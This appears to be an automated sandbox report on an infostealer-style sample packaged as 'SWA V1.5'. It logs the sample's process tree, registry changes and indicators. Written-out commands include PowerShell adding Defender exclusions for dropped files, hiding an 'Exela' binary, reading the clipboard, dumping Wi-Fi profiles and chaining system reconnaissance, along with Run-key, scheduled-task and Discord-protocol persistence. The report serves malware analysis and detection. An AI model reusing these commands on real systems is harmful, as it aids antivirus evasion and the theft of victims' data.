behavioral1/files/0x0007000000023c9d-205.dat upx behavioral1/files/0x0007000000023c9c-204.dat upx behavioral1/files/0x0007000000023c9a-203.dat upx behavioral1/files/0x0007000000023cd2-200.dat upx behavioral1/files/0x0007000000023ccd-197.dat upx behavioral1/memory/3512-278-0x00007FFE0BDD0000-0x00007FFE0BDF4000-memory.dmp upx behavioral1/memory/3512-282-0x00007FFE04030000-0x00007FFE04041000-memory.dmp upx behavioral1/memory/3512-281-0x00007FFE05C60000-0x00007FFE05C79000-memory.dmp upx behavioral1/memory/3512-284-0x00007FFE03A60000-0x00007FFE03A92000-memory.dmp upx behavioral1/memory/3512-285-0x00007FFE1A7B0000-0x00007FFE1A7BA000-memory.dmp upx behavioral1/memory/3512-287-0x00007FFE05400000-0x00007FFE054B8000-memory.dmp upx behavioral1/memory/3512-288-0x00007FFE04250000-0x00007FFE045C5000-memory.dmp upx behavioral1/memory/3512-290-0x00007FFE04010000-0x00007FFE0402E000-memory.dmp upx behavioral1/memory/3512-296-0x00007FFE01440000-0x00007FFE01BCA000-memory.dmp upx behavioral1/memory/3512-286-0x00007FFE054C0000-0x00007FFE054EE000-memory.dmp upx behavioral1/memory/3512-280-0x00007FFE046F0000-0x00007FFE0473D000-memory.dmp upx behavioral1/memory/3512-279-0x00007FFE04740000-0x00007FFE04759000-memory.dmp upx behavioral1/memory/3512-298-0x00007FFE05C20000-0x00007FFE05C57000-memory.dmp upx behavioral1/memory/3512-327-0x00007FFE04760000-0x00007FFE0477B000-memory.dmp upx behavioral1/memory/3512-326-0x00007FFE04780000-0x00007FFE047A2000-memory.dmp upx behavioral1/memory/3512-423-0x00007FFE046F0000-0x00007FFE0473D000-memory.dmp upx behavioral1/memory/3512-422-0x00007FFE04740000-0x00007FFE04759000-memory.dmp upx behavioral1/memory/3512-457-0x00007FFE19FE0000-0x00007FFE19FED000-memory.dmp upx behavioral1/memory/3512-556-0x00007FFE03A60000-0x00007FFE03A92000-memory.dmp upx behavioral1/memory/3512-652-0x00007FFE04740000-0x00007FFE04759000-memory.dmp upx behavioral1/memory/3512-660-0x00007FFE19FE0000-0x00007FFE19FED000-memory.dmp upx behavioral1/memory/3512-661-0x00007FFE01440000-0x00007FFE01BCA000-memory.dmp upx -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1732 sc.exe -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral1/files/0x0008000000023c95-101.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 2268 cmd.exe 3452 netsh.exe -
System Network Connections Discovery 1 TTPs 1 IoCs
Attempt to get a listing of network connections.
pid Process 5188 NETSTAT.EXE -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Collects information from the system 1 TTPs 1 IoCs
Uses WMIC.exe to find detailed system information.
pid Process 5536 WMIC.exe -
Delays execution with timeout.exe 3 IoCs
pid Process 5612 Process not Found 4472 Process not Found 6008 Process not Found -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 3652 WMIC.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE -
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
pid Process 5188 NETSTAT.EXE 5668 ipconfig.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 2592 systeminfo.exe -
Modifies registry class 16 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\discord-1199748644409184347\shell\open\command 4.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\discord-1199748644409184347\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\4.exe" 4.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\discord-1199748644409184347 4.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\discord-1199748644409184347\ = "URL:Run game 1199748644409184347 protocol" 4.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\discord-1199748644409184347\URL Protocol 4.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\discord-1199748644409184347\ = "URL:Run game 1199748644409184347 protocol" 4.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\discord-1199748644409184347\DefaultIcon 4.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\discord-1199748644409184347\shell\open\command 4.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\discord-1199748644409184347\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\4.exe" 4.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\discord-1199748644409184347\DefaultIcon 4.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\discord-1199748644409184347\shell 4.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\discord-1199748644409184347\shell\open 4.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\discord-1199748644409184347\URL Protocol 4.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\discord-1199748644409184347\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\4.exe" 4.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\discord-1199748644409184347\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\4.exe" 4.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\discord-1199748644409184347 4.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 9 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3224 schtasks.exe 3048 schtasks.exe 4444 schtasks.exe 4512 Process not Found 2244 Process not Found 2140 Process not Found 4876 schtasks.exe 1012 Process not Found 5564 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 3752 WINWORD.EXE 3752 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 644 powershell.exe 644 powershell.exe 1524 powershell.exe 1524 powershell.exe 3404 powershell.exe 3404 powershell.exe 848 powershell.exe 848 powershell.exe 2300 powershell.exe 2300 powershell.exe 2300 powershell.exe 1464 powershell.exe 1464 powershell.exe 1464 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 924 powershell.exe 924 powershell.exe 924 powershell.exe 2112 powershell.exe 2112 powershell.exe 2112 powershell.exe 4684 powershell.exe 4684 powershell.exe 4684 powershell.exe 3320 powershell.exe 3320 powershell.exe 3320 powershell.exe 2612 powershell.exe 2612 powershell.exe 1868 powershell.exe 1868 powershell.exe 1868 powershell.exe 2612 powershell.exe 2820 powershell.exe 2820 powershell.exe 2820 powershell.exe 4764 powershell.exe 4764 powershell.exe 848 powershell.exe 848 powershell.exe 4764 powershell.exe 848 powershell.exe 4800 powershell.exe 4800 powershell.exe 4800 powershell.exe 3572 powershell.exe 3572 powershell.exe 3572 powershell.exe 3904 powershell.exe 3904 powershell.exe 3904 powershell.exe 2664 powershell.exe 2664 powershell.exe 2664 powershell.exe 876 нужно.exe 876 нужно.exe 4492 rustme.exe 4492 rustme.exe 4684 powershell.exe 4684 powershell.exe 4684 powershell.exe 3936 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 1144 7zFM.exe Token: 35 1144 7zFM.exe Token: SeSecurityPrivilege 1144 7zFM.exe Token: SeDebugPrivilege 3168 SWA V1.5.exe Token: SeDebugPrivilege 644 powershell.exe Token: SeDebugPrivilege 1524 powershell.exe Token: SeDebugPrivilege 4988 abayounda.exe Token: SeDebugPrivilege 3404 powershell.exe Token: SeDebugPrivilege 848 powershell.exe Token: SeDebugPrivilege 2300 powershell.exe Token: SeDebugPrivilege 876 нужно.exe Token: SeDebugPrivilege 1464 powershell.exe Token: SeDebugPrivilege 4492 rustme.exe Token: SeDebugPrivilege 2032 powershell.exe Token: SeDebugPrivilege 924 powershell.exe Token: SeIncreaseQuotaPrivilege 3652 WMIC.exe Token: SeSecurityPrivilege 3652 WMIC.exe Token: SeTakeOwnershipPrivilege 3652 WMIC.exe Token: SeLoadDriverPrivilege 3652 WMIC.exe Token: SeSystemProfilePrivilege 3652 WMIC.exe Token: SeSystemtimePrivilege 3652 WMIC.exe Token: SeProfSingleProcessPrivilege 3652 WMIC.exe Token: SeIncBasePriorityPrivilege 3652 WMIC.exe Token: SeCreatePagefilePrivilege 3652 WMIC.exe Token: SeBackupPrivilege 3652 WMIC.exe Token: SeRestorePrivilege 3652 WMIC.exe Token: SeShutdownPrivilege 3652 WMIC.exe Token: SeDebugPrivilege 3652 WMIC.exe Token: SeSystemEnvironmentPrivilege 3652 WMIC.exe Token: SeRemoteShutdownPrivilege 3652 WMIC.exe Token: SeUndockPrivilege 3652 WMIC.exe Token: SeManageVolumePrivilege 3652 WMIC.exe Token: 33 3652 WMIC.exe Token: 34 3652 WMIC.exe Token: 35 3652 WMIC.exe Token: 36 3652 WMIC.exe Token: SeIncreaseQuotaPrivilege 3068 WMIC.exe Token: SeSecurityPrivilege 3068 WMIC.exe Token: SeTakeOwnershipPrivilege 3068 WMIC.exe Token: SeLoadDriverPrivilege 3068 WMIC.exe Token: SeSystemProfilePrivilege 3068 WMIC.exe Token: SeSystemtimePrivilege 3068 WMIC.exe Token: SeProfSingleProcessPrivilege 3068 WMIC.exe Token: SeIncBasePriorityPrivilege 3068 WMIC.exe Token: SeCreatePagefilePrivilege 3068 WMIC.exe Token: SeBackupPrivilege 3068 WMIC.exe Token: SeRestorePrivilege 3068 WMIC.exe Token: SeShutdownPrivilege 3068 WMIC.exe Token: SeDebugPrivilege 3068 WMIC.exe Token: SeSystemEnvironmentPrivilege 3068 WMIC.exe Token: SeRemoteShutdownPrivilege 3068 WMIC.exe Token: SeUndockPrivilege 3068 WMIC.exe Token: SeManageVolumePrivilege 3068 WMIC.exe Token: 33 3068 WMIC.exe Token: 34 3068 WMIC.exe Token: 35 3068 WMIC.exe Token: 36 3068 WMIC.exe Token: SeDebugPrivilege 4992 tasklist.exe Token: SeIncreaseQuotaPrivilege 3652 WMIC.exe Token: SeSecurityPrivilege 3652 WMIC.exe Token: SeTakeOwnershipPrivilege 3652 WMIC.exe Token: SeLoadDriverPrivilege 3652 WMIC.exe Token: SeSystemProfilePrivilege 3652 WMIC.exe Token: SeSystemtimePrivilege 3652 WMIC.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 1144 7zFM.exe 1144 7zFM.exe 4996 авааа.exe -
Suspicious use of SetWindowsHookEx 17 IoCs
pid Process 876 нужно.exe 4492 rustme.exe 4996 авааа.exe 3588 юзерок.exe 4968 gay.exe 3752 WINWORD.EXE 3752 WINWORD.EXE 3752 WINWORD.EXE 3752 WINWORD.EXE 3752 WINWORD.EXE 3752 WINWORD.EXE 3752 WINWORD.EXE 3752 WINWORD.EXE 5296 gay.exe 5484 Process not Found 2468 Process not Found 5232 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3168 wrote to memory of 644 3168 SWA V1.5.exe 96 PID 3168 wrote to memory of 644 3168 SWA V1.5.exe 96 PID 3168 wrote to memory of 3556 3168 SWA V1.5.exe 98 PID 3168 wrote to memory of 3556 3168 SWA V1.5.exe 98 PID 3168 wrote to memory of 1524 3168 SWA V1.5.exe 99 PID 3168 wrote to memory of 1524 3168 SWA V1.5.exe 99 PID 3168 wrote to memory of 4988 3168 SWA V1.5.exe 101 PID 3168 wrote to memory of 4988 3168 SWA V1.5.exe 101 PID 3168 wrote to memory of 3404 3168 SWA V1.5.exe 102 PID 3168 wrote to memory of 3404 3168 SWA V1.5.exe 102 PID 3168 wrote to memory of 3324 3168 SWA V1.5.exe 142 PID 3168 wrote to memory of 3324 3168 SWA V1.5.exe 142 PID 3168 wrote to memory of 848 3168 SWA V1.5.exe 179 PID 3168 wrote to memory of 848 3168 SWA V1.5.exe 179 PID 3168 wrote to memory of 384 3168 SWA V1.5.exe 107 PID 3168 wrote to memory of 384 3168 SWA V1.5.exe 107 PID 3168 wrote to memory of 2300 3168 SWA V1.5.exe 108 PID 3168 wrote to memory of 2300 3168 SWA V1.5.exe 108 PID 384 wrote to memory of 3512 384 компоненты.exe 110 PID 384 wrote to memory of 3512 384 компоненты.exe 110 PID 3168 wrote to memory of 876 3168 SWA V1.5.exe 111 PID 3168 wrote to memory of 876 3168 SWA V1.5.exe 111 PID 3168 wrote to memory of 1464 3168 SWA V1.5.exe 112 PID 3168 wrote to memory of 1464 3168 SWA V1.5.exe 112 PID 3168 wrote to memory of 4492 3168 SWA V1.5.exe 114 PID 3168 wrote to memory of 4492 3168 SWA V1.5.exe 114 PID 3168 wrote to memory of 2032 3168 SWA V1.5.exe 190 PID 3168 wrote to memory of 2032 3168 SWA V1.5.exe 190 PID 3512 wrote to memory of 348 3512 компоненты.exe 117 PID 3512 wrote to memory of 348 3512 компоненты.exe 117 PID 3168 wrote to memory of 4636 3168 SWA V1.5.exe 119 PID 3168 wrote to memory of 4636 3168 SWA V1.5.exe 119 PID 3168 wrote to memory of 924 3168 SWA V1.5.exe 120 PID 3168 wrote to memory of 924 3168 SWA V1.5.exe 120 PID 3512 wrote to memory of 1580 3512 компоненты.exe 122 PID 3512 wrote to memory of 1580 3512 компоненты.exe 122 PID 3512 wrote to memory of 4612 3512 компоненты.exe 123 PID 3512 wrote to memory of 4612 3512 компоненты.exe 123 PID 3512 wrote to memory of 3336 3512 компоненты.exe 124 PID 3512 wrote to memory of 3336 3512 компоненты.exe 124 PID 3512 wrote to memory of 2144 3512 компоненты.exe 125 PID 3512 wrote to memory of 2144 3512 компоненты.exe 125 PID 1580 wrote to memory of 3652 1580 cmd.exe 149 PID 1580 wrote to memory of 3652 1580 cmd.exe 149 PID 2144 wrote to memory of 4992 2144 cmd.exe 131 PID 2144 wrote to memory of 4992 2144 cmd.exe 131 PID 4612 wrote to memory of 3068 4612 cmd.exe 132 PID 4612 wrote to memory of 3068 4612 cmd.exe 132 PID 3512 wrote to memory of 2548 3512 компоненты.exe 133 PID 3512 wrote to memory of 2548 3512 компоненты.exe 133 PID 2548 wrote to memory of 1556 2548 cmd.exe 135 PID 2548 wrote to memory of 1556 2548 cmd.exe 135 PID 3512 wrote to memory of 5040 3512 компоненты.exe 212 PID 3512 wrote to memory of 5040 3512 компоненты.exe 212 PID 3512 wrote to memory of 1744 3512 компоненты.exe 138 PID 3512 wrote to memory of 1744 3512 компоненты.exe 138 PID 3168 wrote to memory of 1532 3168 SWA V1.5.exe 136 PID 3168 wrote to memory of 1532 3168 SWA V1.5.exe 136 PID 3168 wrote to memory of 2112 3168 SWA V1.5.exe 305 PID 3168 wrote to memory of 2112 3168 SWA V1.5.exe 305 PID 1744 wrote to memory of 4300 1744 cmd.exe 143 PID 1744 wrote to memory of 4300 1744 cmd.exe 143 PID 5040 wrote to memory of 4008 5040 cmd.exe 206 PID 5040 wrote to memory of 4008 5040 cmd.exe 206 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2828 attrib.exe
Processes
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\SWA V1.5.rar"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1144
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3276
-
C:\Users\Admin\Desktop\SWA V1.5\SWA V1.5.exe"C:\Users\Admin\Desktop\SWA V1.5\SWA V1.5.exe"1⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3168 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\5.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:644
-
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"2⤵
- Executes dropped EXE
PID:3556
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\abayounda.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1524
-
-
C:\Users\Admin\AppData\Local\Temp\abayounda.exe"C:\Users\Admin\AppData\Local\Temp\abayounda.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:4988
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\нужно2.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3404
-
-
C:\Users\Admin\AppData\Local\Temp\нужно2.exe"C:\Users\Admin\AppData\Local\Temp\нужно2.exe"2⤵
- Executes dropped EXE
PID:3324
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\компоненты.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:848
-
-
C:\Users\Admin\AppData\Local\Temp\компоненты.exe"C:\Users\Admin\AppData\Local\Temp\компоненты.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:384 -
C:\Users\Admin\AppData\Local\Temp\компоненты.exe"C:\Users\Admin\AppData\Local\Temp\компоненты.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3512 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"4⤵PID:348
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"4⤵
- Suspicious use of WriteProcessMemory
PID:1580 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:3652
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"4⤵
- Suspicious use of WriteProcessMemory
PID:4612 -
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get Manufacturer5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3068
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "gdb --version"4⤵PID:3336
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"4⤵
- Suspicious use of WriteProcessMemory
PID:2144 -
C:\Windows\system32\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4992
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"4⤵
- Suspicious use of WriteProcessMemory
PID:2548 -
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_ComputerSystem get Manufacturer5⤵PID:1556
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵
- Suspicious use of WriteProcessMemory
PID:5040 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵PID:4008
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"4⤵
- Suspicious use of WriteProcessMemory
PID:1744 -
C:\Windows\system32\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:4300
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe""4⤵
- Hide Artifacts: Hidden Files and Directories
PID:4208 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:3652
-
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe"5⤵
- Views/modifies file attributes
PID:2828
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"4⤵PID:3936
-
C:\Windows\system32\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:2272
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"4⤵PID:856
-
C:\Windows\system32\cmd.execmd.exe /c chcp5⤵PID:2148
-
C:\Windows\system32\chcp.comchcp6⤵PID:2956
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"4⤵PID:740
-
C:\Windows\system32\cmd.execmd.exe /c chcp5⤵PID:4872
-
C:\Windows\system32\chcp.comchcp6⤵PID:3232
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:4336
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:4360
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"4⤵
- Clipboard Data
PID:2556 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Get-Clipboard5⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:848
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profiles"4⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2268 -
C:\Windows\system32\netsh.exenetsh wlan show profiles5⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3452
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"4⤵
- Network Service Discovery
PID:1728 -
C:\Windows\system32\systeminfo.exesysteminfo5⤵
- Gathers system information
PID:2592
-
-
C:\Windows\system32\HOSTNAME.EXEhostname5⤵PID:5532
-
-
C:\Windows\System32\Wbem\WMIC.exewmic logicaldisk get caption,description,providername5⤵
- Collects information from the system
PID:5536
-
-
C:\Windows\system32\net.exenet user5⤵PID:6012
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user6⤵PID:5444
-
-
-
C:\Windows\system32\query.exequery user5⤵PID:5440
-
C:\Windows\system32\quser.exe"C:\Windows\system32\quser.exe"6⤵PID:6024
-
-
-
C:\Windows\system32\net.exenet localgroup5⤵PID:5260
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup6⤵PID:1588
-
-
-
C:\Windows\system32\net.exenet localgroup administrators5⤵PID:6132
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators6⤵PID:3520
-
-
-
C:\Windows\system32\net.exenet user guest5⤵PID:6084
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user guest6⤵PID:5144
-
-
-
C:\Windows\system32\net.exenet user administrator5⤵PID:4824
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user administrator6⤵PID:5284
-
-
-
C:\Windows\System32\Wbem\WMIC.exewmic startup get caption,command5⤵PID:6104
-
-
C:\Windows\system32\tasklist.exetasklist /svc5⤵
- Enumerates processes with tasklist
PID:5264
-
-
C:\Windows\system32\ipconfig.exeipconfig /all5⤵
- Gathers network information
PID:5668
-
-
C:\Windows\system32\ROUTE.EXEroute print5⤵PID:6060
-
-
C:\Windows\system32\ARP.EXEarp -a5⤵
- Network Service Discovery
PID:6116
-
-
C:\Windows\system32\NETSTAT.EXEnetstat -ano5⤵
- System Network Connections Discovery
- Gathers network information
PID:5188
-
-
C:\Windows\system32\sc.exesc query type= service state= all5⤵
- Launches sc.exe
PID:1732
-
-
C:\Windows\system32\netsh.exenetsh firewall show state5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:396
-
-
C:\Windows\system32\netsh.exenetsh firewall show config5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2968
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵PID:1868
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵PID:5472
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵PID:5572
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵PID:5276
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\нужно.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2300
-
-
C:\Users\Admin\AppData\Local\Temp\нужно.exe"C:\Users\Admin\AppData\Local\Temp\нужно.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:876 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\нужно.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3320
-
-
